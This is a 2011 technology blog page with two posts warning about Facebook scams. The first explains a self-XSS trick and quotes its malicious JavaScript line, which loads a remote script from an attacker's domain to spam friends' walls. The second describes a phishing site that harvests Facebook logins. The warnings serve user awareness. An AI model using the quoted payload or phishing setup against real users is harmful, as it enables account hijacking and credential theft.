Technology Feed Lab

technology site

Posts Tagged ‘attacker’

The fake pages spreading on Facebook, poses risk to users

Posted by TechGeek on November 11, 2011

We are observing a lot of fake pages being created on Facebook by attackers. The idea is to create fake pages and then verifying user by following some manual steps in order to reveal the secret video behind it. The manual steps does not reveal secret video rather it will spread the page with different messages like “WOW Check this out it is cool”, “OMG have you seen this??” or “Check this out.. It is awesome!” on your friend’s wall post. Here is how message spreads,

fb msg 300x281 The fake pages spreading on Facebook, poses risk to usersThe above victim has posted messages to his all friends. Once you click on the link, you will be taken to Facebook page which looks like,

page home 300x189 The fake pages spreading on Facebook, poses risk to usersThe page post a message like “warning only 18+ verify your age by following easy steps”. This has been done intentionally by the attacker in order to do his/her malicious activity behind. Once you click on continue button, it displays another animation with some instructions to follow. Here is how they look,

instuctions 252x300 The fake pages spreading on Facebook, poses risk to users

So when you type “J” on address bar and presses Ctrl+V, it will append malicious JavaScript which is “avascript:(a=(b=document).createElement(‘script’)).src=’http://appnsnap.com/IDareYou/a.js’,b.body.appendChild(a);void(0)” to J letter which will create Javascript. So this JavaScript is responsible for spreading this message on your friend’s wall post.

Once you hit enter after pasting this script in the address bar, it will run the malicious code from “a.js” file. The code gathers all your friend’s and send them random message with link to this malicious page. The source code of  “a.js” is here. You can see the JavaScript code being used to post such messages.

Avoid visiting such pages on Facebook. Do not enter anything like JavaScript in the address bar and run it. Nothing will be revealed behind and you will become victim to such scams.

Please like us our page on Facebook and spread this blog.

Posted in Facebook | Tagged: , , , , , , , | Leave a Comment »

Beware of Facebook phishing pages

Posted by TechGeek on September 20, 2011

Phishing is an act of tricking someone into providing their confidential information such as usernames, passwords and other sensitive information. Generally, phishing is carried out via e-mail messages or on websites which claims to be a legitimate site. Attackers use popular social sites such as Facebook or MySpace to create similar looking pages on fake domains they created.

They will send emails to victims asking them to log on to the site and update account information. If you don’t look out closely the domain name used in the address bar, you will likely to send your sensitive personal information to the attacker. We are seeing so many fake domains and pages being used to carry out phishing attacks using Facebook pages. Here is one of the live examples,

facebook phishing 300x174 Beware of Facebook phishing pagesLook at the highlighted address bar in the above image. The address is different than real Facebook which points to “http://www.faceworldverified.com/update/index15.php”. This is fake site created to fool victims in order to gain or steal personal information like email and password. Once victim enters his/her information like Facebook email and password, this site will steal your information and send it to remote server which is under attacker’s control. The above site then immediately sends victim to Facebook application page “http://apps.facebook.com/videos/video.php?logged=true”.

For testing we used test@testhacker.com as an email and testhacker as a password. Once we enter this information, here is the HTTP GET request which sends login information to the remote server and immediately redirects victim to the Facebook application. Here is the GET request, packet 300x59 Beware of Facebook phishing pagesYou can clearly see email and password being sent in the above request. Remember 3 things,

1)      Never click on any suspicious or unknown links send in the Email.

2)      Always check domain address in the address bar of your browser before entering any information

3)      Do some Google search if you came across any suspicious Phishing site and report it Google.

Stay away from phishing and spread this to your friends and family. Become a fan on our Facebook page to get valuable information.

pixel Beware of Facebook phishing pages

Posted in Phishing | Tagged: , , , , , | Leave a Comment »